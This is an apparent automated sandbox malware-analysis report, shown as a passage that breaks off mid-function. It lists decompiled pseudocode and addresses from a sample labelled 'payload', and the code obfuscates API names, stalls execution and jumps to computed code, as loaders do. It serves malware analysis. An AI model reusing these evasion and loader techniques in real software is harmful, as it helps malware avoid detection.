    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x0040276b
    0x00402771
    0x00402776
    0x0040277b
    0x00402780
    0x00402782
    0x00402785
    0x0040278a
    0x0040278f
    0x00402796
    0x00000000
    0x00000000
    0x0040279c
    0x0040279e
    0x004027a1
    0x004027a6
    0x004027ab
    0x004027b2
    0x00000000
    0x00000000
    0x004027b8
    0x004027c2
    0x004027c8
    0x004027c9

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401FE4, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 137synchronization
    C-Code - Quality: 46%
    			E00401FE4() {
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				struct HINSTANCE__* _t20;
				void* _t21;
				struct HINSTANCE__* _t24;
				void* _t25;
				void* _t26;
				long _t28;
				intOrPtr* _t30;
				intOrPtr _t31;
				void* _t36;
				signed int _t37;
				intOrPtr* _t40;
				void* _t44;
				void* _t48;
				void* _t50;
				intOrPtr* _t52;
				void* _t61;

				_push("zzdjjqpqaxlgt");
				_t12 = E00402E18(_t11);
				_push( *0x4050cf);
				_t13 = E00402AD0(_t12);
				_push("zzdjjqpqaxlgt");
				_t14 = E00402E18(_t13);
				_push(0xf);
				 *_t52 =  *_t52 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t14) != 0) {
					L1:
					_push(1);
					 *_t52 =  *_t52 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t16 = E00401CAE(_t15); // executed
					if(_t16 != 0 || _t50 < 0xfd00) {
						L16:
						L17:
						goto L17;
					} else {
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t20 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t20;
						_t40 = "pejpCreate";
						 *_t40 = 0x70616548;
						 *((short*)(_t40 + 4)) = 0x7243;
						 *((short*)(_t40 + 6)) = 0x6165;
						_push(_t40);
						_push(_t20);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t20);
						_push(1);
						 *_t52 =  *_t52 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t21 = E00401CAE(_t20); // executed
						if(_t21 != 0) {
							goto L16;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t24 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t50 - 4)) = _t24;
						_push(_t24);
						if(_t24 == 0) {
							goto L16;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t25 = E00402E18(_t24); // executed
						_push("true");
						 *_t52 =  *_t52 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t26 = E00402BB3(_t25); // executed
						if(_t26 != 0) {
							goto L16;
						}
						_push(0x1e);
						do {
							_t28 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t52 =  *_t52 - 1;
						} while ( *_t52 != 0);
						_t52 = _t52 + 4;
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t28); // executed
						_pop(_t44);
						 *_t52 =  *_t52 +  *((intOrPtr*)(_t44 + 0x3c));
						_t48 = _t44;
						 *0x405002 = _t48 + 0xa4;
						_t30 =  *0x405002;
						_t31 =  *_t30;
						 *0x405002 = _t31;
						_t61 =  *0x405002 - 0xfff;
						if(_t61 > 0) {
							goto L16;
						}
						asm("sbb dword [ecx], 0xa0");
						if(_t61 < 0) {
							goto L16;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t36);
						 *0x40501a =  *0x40501a + _t36;
						if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							_t37 =  *0x40501a; // 0x0
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
				}
				_push(1);
				 *_t52 =  *_t52 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t37) != 0) {
					goto L1;
				}
				_push(1);
				 *_t52 =  *_t52 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(_t15 != 0) {
					goto L1;
				}
				_push(E00402749);
				return E00402749;
			}
























    0x00401fe4
    0x00401fe9
    0x00401fee
    0x00401ff4
    0x00401ff9
    0x00401ffe
    0x00402003
    0x00402005
    0x00402008
    0x0040200d
    0x0040201a
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f27
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x00402020
    0x00402022
    0x00402025
    0x0040202a
    0x00402037
    0x00000000
    0x00000000
    0x0040203d
    0x0040203f
    0x00402042
    0x00402047
    0x00402053
    0x00000000
    0x00000000
    0x0040205f
    0x00402060

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401DA1, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 137synchronization
    C-Code - Quality: 49%
    			E00401DA1() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr* _t40;
				void* _t44;
				void* _t48;
				void* _t50;
				intOrPtr* _t52;

				_push(1);
				 *_t52 =  *_t52 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t11) != 0) {
					L4:
					_push(1);
					 *_t52 =  *_t52 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L16:
						L17:
						goto L17;
					}
					__eflags = _t50 - 0xfd00;
					if(_t50 < 0xfd00) {
						goto L16;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t40 = "pejpCreate";
					 *_t40 = 0x70616548;
					 *((short*)(_t40 + 4)) = 0x7243;
					 *((short*)(_t40 + 6)) = 0x6165;
					_push(_t40);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t52 =  *_t52 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L16;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t50 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L16;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t52 =  *_t52 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L16;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t52 =  *_t52 - 1;
						__eflags =  *_t52;
					} while ( *_t52 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t44);
					 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t52 + 4)) +  *((intOrPtr*)(_t44 + 0x3c));
					_t48 = _t44;
					 *0x405002 = _t48 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L16;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L16;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t50 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push("zzdjjqpqaxlgt");
				_t36 = E00402E18(_t12);
				_push("zzdjjqpqaxlgt");
				_t37 = E00402E18(_t36);
				_push(1);
				 *_t52 =  *_t52 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t37) != 0) {
					goto L4;
				}
				_push( *0x4050cf);
				_t38 = E00402AD0(_t12);
				_push(1);
				 *_t52 =  *_t52 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t38) != 0) {
					goto L4;
				}
				_push(E00402749);
				return E00402749;
			}






















    0x00401da1
    0x00401da3
    0x00401da6
    0x00401dab
    0x00401db7
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401db9
    0x00401dbe
    0x00401dc3
    0x00401dc8
    0x00401dcd
    0x00401dcf
    0x00401dd2
    0x00401dd7
    0x00401de4
    0x00000000
    0x00000000
    0x00401de6
    0x00401dec
    0x00401df1
    0x00401df3
    0x00401df6
    0x00401dfb
    0x00401e07
    0x00000000
    0x00000000
    0x00401e0f
    0x00401e10

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 004011B7, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 137synchronization
    C-Code - Quality: 48%
    			E004011B7() {
				void* _t11;
				void* _t12;
				void* _t13;
				intOrPtr _t15;
				struct HINSTANCE__* _t19;
				intOrPtr _t20;
				struct HINSTANCE__* _t23;
				void* _t24;
				intOrPtr _t25;
				long _t27;
				intOrPtr* _t29;
				intOrPtr _t30;
				void* _t35;
				intOrPtr* _t40;
				void* _t44;
				void* _t48;
				void* _t50;
				intOrPtr* _t52;

				_push("zzdjjqpqaxlgt");
				_t12 = E00402E18(_t11);
				_push("zzdjjqpqaxlgt");
				_t13 = E00402E18(_t12);
				_push(0xf);
				 *_t52 =  *_t52 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t13) != 0) {
					L4:
					_push(1);
					 *_t52 =  *_t52 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t15 = E00401CAE(_t14); // executed
					__eflags = _t15;
					if(_t15 != 0) {
						L16:
						L17:
						goto L17;
					}
					__eflags = _t50 - 0xfd00;
					if(_t50 < 0xfd00) {
						goto L16;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t19 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t19;
					_t40 = "pejpCreate";
					 *_t40 = 0x70616548;
					 *((short*)(_t40 + 4)) = 0x7243;
					 *((short*)(_t40 + 6)) = 0x6165;
					_push(_t40);
					_push(_t19);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t19);
					_push(1);
					 *_t52 =  *_t52 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t20 = E00401CAE(_t19); // executed
					__eflags = _t20;
					if(_t20 != 0) {
						goto L16;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t23 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t50 - 4)) = _t23;
					_push(_t23);
					__eflags = _t23;
					if(_t23 == 0) {
						goto L16;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t24 = E00402E18(_t23); // executed
					_push("true");
					 *_t52 =  *_t52 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t25 = E00402BB3(_t24); // executed
					__eflags = _t25;
					if(_t25 != 0) {
						goto L16;
					}
					_push(0x1e);
					do {
						_t27 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t52 =  *_t52 - 1;
						__eflags =  *_t52;
					} while ( *_t52 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t27); // executed
					_pop(_t44);
					 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t52 + 4)) +  *((intOrPtr*)(_t44 + 0x3c));
					_t48 = _t44;
					 *0x405002 = _t48 + 0xa4;
					_t29 =  *0x405002;
					_t30 =  *_t29;
					 *0x405002 = _t30;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L16;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L16;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t35);
					 *0x40501a =  *0x40501a + _t35;
					__eflags =  *((intOrPtr*)(_t50 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push(0xf);
				 *_t52 =  *_t52 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t14 != 0) {
					goto L4;
				}
				_push(1);
				 *_t52 =  *_t52 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(_t14 != 0) {
					goto L4;
				}
				_push("zzdjjqpqaxlgt");
				E00402E18(_t14);
				_push(E00402749);
				return E00402749;
			}





















    0x004011b7
    0x004011bc
    0x004011c1
    0x004011c6
    0x004011cb
    0x004011cd
    0x004011d0
    0x004011d5
    0x004011e1
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x004011e7
    0x004011e9
    0x004011ec
    0x004011f1
    0x004011fd
    0x00000000
    0x00000000
    0x00401203
    0x00401205
    0x00401208
    0x0040120d
    0x0040121a
    0x00000000
    0x00000000
    0x00401220
    0x00401225
    0x00401230
    0x00401231

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 0040257D, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135synchronization
    C-Code - Quality: 47%
    			E0040257D() {
				void* _t11;
				void* _t13;
				struct HINSTANCE__* _t17;
				void* _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				void* _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				signed int _t34;
				void* _t35;
				void* _t36;
				intOrPtr* _t39;
				void* _t43;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				void* _t60;

				_push(1);
				 *_t51 =  *_t51 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t11) != 0) {
					L1:
					_push(1);
					 *_t51 =  *_t51 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					if(_t13 != 0 || _t49 < 0xfd00) {
						L16:
						L17:
						goto L17;
					} else {
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t17 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t17;
						_t39 = "pejpCreate";
						 *_t39 = 0x70616548;
						 *((short*)(_t39 + 4)) = 0x7243;
						 *((short*)(_t39 + 6)) = 0x6165;
						_push(_t39);
						_push(_t17);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t17);
						_push(1);
						 *_t51 =  *_t51 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t18 = E00401CAE(_t17); // executed
						if(_t18 != 0) {
							goto L16;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t49 - 4)) = _t21;
						_push(_t21);
						if(_t21 == 0) {
							goto L16;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t22 = E00402E18(_t21); // executed
						_push("true");
						 *_t51 =  *_t51 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t23 = E00402BB3(_t22); // executed
						if(_t23 != 0) {
							goto L16;
						}
						_push(0x1e);
						do {
							_t25 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t51 =  *_t51 - 1;
						} while ( *_t51 != 0);
						_t51 = _t51 + 4;
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t25); // executed
						_pop(_t43);
						 *_t51 =  *_t51 +  *((intOrPtr*)(_t43 + 0x3c));
						_t47 = _t43;
						 *0x405002 = _t47 + 0xa4;
						_t27 =  *0x405002;
						_t28 =  *_t27;
						 *0x405002 = _t28;
						_t60 =  *0x405002 - 0xfff;
						if(_t60 > 0) {
							goto L16;
						}
						asm("sbb dword [ecx], 0xa0");
						if(_t60 < 0) {
							goto L16;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t33);
						 *0x40501a =  *0x40501a + _t33;
						if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							_t34 =  *0x40501a; // 0x0
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
				}
				_push( *0x4050cf);
				_t35 = E00402AD0(_t34);
				_push(0xf);
				 *_t51 =  *_t51 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t35) != 0) {
					goto L1;
				}
				_push("zzdjjqpqaxlgt");
				_t36 = E00402E18(_t12);
				_push(1);
				 *_t51 =  *_t51 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t36) != 0) {
					goto L1;
				}
				_push(E00401784);
				return E00401784;
			}























    0x0040257d
    0x0040257f
    0x00402582
    0x00402587
    0x00402594
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f27
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x0040259a
    0x004025a0
    0x004025a5
    0x004025a7
    0x004025aa
    0x004025af
    0x004025bb
    0x00000000
    0x00000000
    0x004025c1
    0x004025c6
    0x004025cb
    0x004025cd
    0x004025d0
    0x004025d5
    0x004025e2
    0x00000000
    0x00000000
    0x004025ee
    0x004025ef

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401000, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135synchronization
    C-Code - Quality: 48%
    			E00401000() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				void* _t36;
				void* _t37;
				intOrPtr* _t39;
				void* _t43;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;

				_push("true");
				 *_t51 =  *_t51 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t11) != 0) {
					L4:
					_push(1);
					 *_t51 =  *_t51 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L16:
						L17:
						goto L17;
					}
